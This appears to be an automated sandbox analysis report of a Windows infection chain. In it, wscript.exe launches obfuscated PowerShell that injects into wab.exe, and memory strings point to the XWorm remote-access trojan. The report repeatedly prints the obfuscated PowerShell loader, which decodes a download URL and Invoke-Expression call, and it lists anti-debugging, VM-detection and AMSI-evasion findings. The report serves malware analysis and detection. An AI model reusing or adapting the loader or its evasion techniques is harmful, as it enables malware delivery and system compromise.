Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: wscript.exe, 00000001.00000003.1440383799.00000197C29C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?]
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllts

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match	File source: amsi64_7772.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4260000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: CCFFF0			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr ns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr ns
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr ns			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr ns			Jump to behavior

Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-

Language, Device and Operating System Detection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
